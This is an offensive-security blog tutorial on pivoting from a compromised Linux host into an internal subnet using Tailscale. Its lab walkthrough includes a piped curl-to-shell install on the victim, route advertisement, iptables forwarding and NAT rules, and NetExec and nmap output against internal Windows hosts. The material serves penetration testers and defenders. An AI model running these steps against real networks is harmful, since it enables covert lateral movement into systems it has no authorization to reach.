Bipolar Disorder: Pivoting with TailScale

Pivoting is used in a post-exploitation context and has many techniques. In this article I will also demonstrate the ability to move around the network using TailScale.

Bipolar Disorder: Pivoting with TailScale

Pivoting is used in a post-exploitation context and has many techniques. In this article I will also demonstrate the ability to move around the network using TailScale.

Caster - Bipolar Disorder

Genre: Offensive, Experimental
Label: exploit.org	
Release Date: 15 November 2024

Performed by: Caster
Written by: Magama Bazarov
Mastered by: Magama Bazarov, Anastasia Graves
Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)
Cover Edit: Caster

https://blog.exploit.org/caster-bipolar-disorder

Intro

TailScale - is a VPN solution based on the Wireguard protocol that solves many problems related to NAT and network complexity. Due to its speed and convenience, this tool can be used by attackers to infiltrate networks and create virtual connections, allowing them to bypass restrictions and reach hidden network segments.

In this article, I will demonstrate how an attacker can use TailScale to gain a foothold in a compromised network and then move on to other subnets, bypassing NAT restrictions and minimizing the possibility of detection. We will focus on attacking a compromised Linux host using TailScale to create bridges between networks.

Disclaimer

This article is of an introductory nature and is intended solely for information security specialists conducting testing within the framework of concluded contracts. The author and the editorial staff are not liable for any damage caused by the use of the information presented. The distribution of malware, disruption of systems and confidentiality of correspondence is a violation of the law and may result in criminal liability.

TailScale Intro

TailScale is a solution designed to create virtual networks between devices and is an analog of the well-known ZeroTier. Its key feature is its ease of use and automatic setup of connections between nodes without the need for complex configuration.

TailScale official site

Key features of TS include:

  1. Ease of use: TailScale automatically manages encryption keys and connection setup, eliminating the need for manual configuration. This allows users to easily deploy a network with minimal technical effort;
  2. NAT traversal: One of TailScale's main advantages is its ability to bypass NAT and other network restrictions. This is accomplished through tunneling technology, making it ideal for remote access to systems behind routers and firewalls;
  3. Versatility: TailScale supports a wide range of routing and network access control capabilities. For example, it can be used to announce routes to local networks and make them available to other devices on the TailScale network. Speaking of which, this nuance will be used by the attacker in this paper;
  4. Cross-platform: TailScale supports multiple platforms including Windows, Linux, macOS, iOS and Android, allowing it to be used on almost any device. This makes it convenient for both personal use and corporate needs;
  5. Flexibility in network management: TailScale offers flexible customization through its management console, where you can easily add new nodes, manage permissions and monitor activity.

To get started with TS, you must register an account.

This is done very simply, so I will not describe the process in detail.

Scenario

The following scenario will be covered in this article. An attacker from the Internet has compromised a Linux machine and due to privilege escalation has root privileges. The compromised machine itself has two interfaces and the attacker's task will be to gain access to the infrastructure behind eth1

This will be accomplished by installing TailScale on the attacker's and the compromised machine's systems, configuring routing and NAT.

Scenario
Host Address Operating System
Attacker 100.X.Y.Z (TailScale Virtual Link) Kali Linux 2024.3
Victim 100.X.Y.Z (TailScale Virtual Link) Debian 12
RB7 172.16.150.223/24 Windows 10 Enterprise LTSC
RB8 172.16.150.221/24 Windows 10 Enterprise LTSC
RB9 172.16.150.224/24 Windows 10 Enterprise LTSC
RB10 172.16.150.226/24 Windows 10 Enterprise LTSC

Remarks

  • This is a scenario in which the attacker is on the Internet and has compromised the host behind the NAT;
  • Root privileges are required to install TS.

TS Deploying (Compromised Host)

First, TailScale must be installed on the compromised machine. This is accomplished by downloading a special .sh file and then executing it:

@compromised:~# curl -fsSL https://tailscale.com/install.sh | sh

Then you need to activate the TS operation, this is done with one simple command:

@compromised:~# tailscale up

After this action, a link will be generated to connect the compromised machine to the TailScale virtual network:

@compromised:~# tailscale up

To authenticate, visit:

	https://login.tailscale.com/a/10ec90a1013477

After clicking on the “Connect” button - the compromised machine has successfully connected to the TailScale network.

@compromised:~# tailscale up

To authenticate, visit:

	https://login.tailscale.com/a/10ec90a1013477

Success.

This can be verified from the TS control panel:

After installing TailScale and running it - a virtual interface tailscale0 will appear on the compromised machine, it is designed to work with the TS virtual network:

4: tailscale0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1280 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none 
    inet 100.77.225.125/32 scope global tailscale0
       valid_lft forever preferred_lft forever
    inet6 fd7a:115c:a1e0::ae01:e17d/128 scope global 
       valid_lft forever preferred_lft forever
    inet6 fe80::231a:9bfb:31a6:f5b3/64 scope link stable-privacy 
       valid_lft forever preferred_lft forever

Now it is necessary to make an announcement of the route. According to the network diagram, behind the compromised machine is interface eth1 with an address in the range 172.16.150.0/24.

This route announcement is necessary so that the attacker, when connecting to the TS network, will automatically receive this route and be able to communicate with the internal infrastructure using it. This is done simply, in two commands:

root@compromised:~# tailscale down
root@compromised:~# tailscale up --advertise-routes=172.16.150.0/24

The TS service is first shut down and then brought up with the --advertise-routes argument with respect to the 172.16.150.0/24 subnet.

After restarting TS with the --advertise-routes argument, you must go into the settings of the compromised machine in the control panel and configure this announcement:

This completes the initial installation of TailScale on the compromised machine. I'll come back to the routing and NAT settings a bit later, now we need to do the identical steps on the attacker's machine.

Why use 100.X.Y.Z addresses?

Tailscale automatically assigns each device on its network a unique IP address. These addresses belong to a range of addresses defined in RFC 6598 known as Carrier-Grade NAT.

CGNAT addresses are taken from the special IPv4 range 100.64.0.0.0/10, which covers the range 100.64.0.0 to 100.127.255.255. They are special purpose addresses (RFC5735), similar to private IP addresses such as 10.0.0.0/8 or 192.168.0.0/16

Tailscale uses addresses from the CGNAT range for several reasons:

  • These addresses have little or no overlap with ranges commonly used on private networks, such as 10.0.0.0/8 or 192.168.0.0/16
  • CGNAT addresses are suitable for intermediate traffic that requires additional NAT before reaching the Internet. This coincides with Tailscale's NAT mechanism of operation

The use of CGNAT allows Tailscale to operate effectively without conflict with existing networks.

TS Deploying (Attacker Host)

Same old same old: downloading and executing the sh-script:

caster@kali:~$ sudo curl -fsSL https://tailscale.com/install.sh | sh

Then TS service activation:

caster@kali:~$ sudo tailscale up


To authenticate, visit:

	https://login.tailscale.com/a/1506661201d021

Connecting Kali to the TailScale virtual network:

After clicking on the “Connect” button - the attacker's machine will connect to the TS network:

Kali & Victim in TS network

Kali will also have its own virtual tailscale0 interface directly for working with virtual networking:

3: tailscale0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1280 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none 
    inet 100.97.65.120/32 scope global tailscale0
       valid_lft forever preferred_lft forever
    inet6 fd7a:115c:a1e0::ff01:4178/128 scope global 
       valid_lft forever preferred_lft forever
    inet6 fe80::8519:d82:f240:e9bf/64 scope link stable-privacy proto kernel_ll 
       valid_lft forever preferred_lft forever

However, since we previously configured route announcement, we need to restart TailScale on the attacker's machine with the --accept-routes argument:

caster@kali:~$ sudo tailscale down
caster@kali:~$ sudo tailscale up --accept-routes

The attacker will then be able to access 172.16.150.0/24 using this route

No route but...

What is noteworthy is that the operating system itself does not have the route 172.16.150.0/24, but routing through TS will work.

Routing, NAT

The routing and NAT configuration stage is key to the successful operation of the tunnel. It allows you to redirect traffic between network interfaces and correctly handle packets coming from different hosts. Here we will use three basic commands, each of which performs an important function in the routing and NAT configuration process.

Forwarding

First, you need to enable kernel-level routing by enabling packet forwarding. This is accomplished with the following command:

@compromised:~# sysctl -w net.ipv4.ip_forward=1

This command modifies the ip_forward parameter , which allows IP packets to be forwarded between interfaces on this host. Without this step, traffic will not be forwarded, making it necessary for all configurations with NAT and routing.

FW Rules

Now we need to create routing rules for the Tailscale tunnel to work correctly using iptables. These rules determine how packets are handled when they are forwarded across interfaces:

@compromised:~# iptables -A FORWARD -i eth1 -o tailscale0 -m state --state RELATED,ESTABLISHED -j ACCEPT
@compromised:~# iptables -A FORWARD -i tailscale0 -o eth1 -j ACCEPT

Rules Breakdown

  • The first command allows forwarding traffic that was initiated from the remote side and returned back. It checks the state of the connection and accepts packets that are in the RELATED,ESTABLISHED state . This is important to support already existing sessions;
  • The second command allows all packets that pass from the tailscale0 interface to eth1 to be forwarded to allow connection to network resources behind NAT.

To complete the routing and NAT configuration, let's add another rule for masquerading so that traffic is correctly forwarded to the 172.16.150.0/24 subnet representing the target infrastructure:

@compromised:~# iptables -t nat -A POSTROUTING -o tailscale0 -d 172.16.150.0/24 -j MASQUERADE

These rules allow the tunnel to operate transparently, redirecting traffic between interfaces and allowing devices on both sides of the network to see each other.

Impact

After all the configurations, the attacker has connectivity to 172.16.150.0/24, to clearly demonstrate the impact of this piitting method I will demonstrate a couple of utilities.

NetExec

caster@kali:~$ netexec smb 172.16.150.0/24 -u caster -p caster 
SMB         172.16.150.224  445    RB9              [*] Windows 10 / Server 2019 Build 19041 (name:RB9) (domain:RB9) (signing:False) (SMBv1:False)
SMB         172.16.150.221  445    RB8              [*] Windows 10 / Server 2019 Build 19041 (name:RB8) (domain:RB8) (signing:False) (SMBv1:False)
SMB         172.16.150.223  445    RB7              [*] Windows 10 / Server 2019 Build 19041 (name:RB7) (domain:RB7) (signing:False) (SMBv1:False)
SMB         172.16.150.226  445    RB10             [*] Windows 10 / Server 2019 Build 19041 (name:RB10) (domain:RB10) (signing:False) (SMBv1:False)
SMB         172.16.150.224  445    RB9              [+] RB9\caster:caster 
SMB         172.16.150.221  445    RB8              [+] RB8\caster:caster 
SMB         172.16.150.223  445    RB7              [+] RB7\caster:caster 
SMB         172.16.150.226  445    RB10             [+] RB10\caster:caster 
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

NetExec (text output)

NetExec

Port Scan

caster@kali:~$ sudo nmap -Pn -n -p 445,3389 172.16.150.0/24 --open --min-rate=1280 --max-rate=2000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-15 09:02 +05
Nmap scan report for 172.16.150.221
Host is up (0.00056s latency).

PORT     STATE SERVICE
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap scan report for 172.16.150.223
Host is up (0.00073s latency).

PORT     STATE SERVICE
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap scan report for 172.16.150.224
Host is up (0.00050s latency).

PORT     STATE SERVICE
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap scan report for 172.16.150.226
Host is up (0.00049s latency).

PORT     STATE SERVICE
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap done: 256 IP addresses (256 hosts up) scanned in 1.00 seconds
caster@kali:~$ 

Nmap (text output)

Nmap Port Scan

Proof of traffic flow through TS

caster@kali:~$ mtr

mtr (traceroute)

Traceroute (mtr)

As you can see on the screenshot, traffic regarding the 172.16.150.0/24 network successfully passes through the TailScale node.

Outro

Tailscale is a tool for building secure networks on top of the Internet. It provides easy setup, automatic routing, and secure connectivity between devices without the need for complex configuration. However, like any other technology, Tailscale can be used for unexpected purposes.

In the hands of an attacker, Tailscale becomes an unusually effective tool for pivoting. Using its routing, NAT and automatic NAT piercing capabilities, an attacker can easily penetrate internal networks and pass traffic between different segments while remaining invisible to standard defense mechanisms. For example, a properly configured Tailscale tunnel can be used to gain access to private resources and infrastructures that would be inaccessible using traditional VPNs.

It is important to note that using Tailscale for pivoting is an extremely specific reserch that differs significantly from traditional methods. It requires a deep understanding of networking, NAT technologies, and detailed configuration of routing and firewalls. This makes this approach more complex, but also more sophisticated, giving the attacker unique opportunities to penetrate the target networks.

Subscribe to exploit.org

Don’t miss out on the latest issues. Sign up now to get access to the library of members-only issues.
[email protected]
Subscribe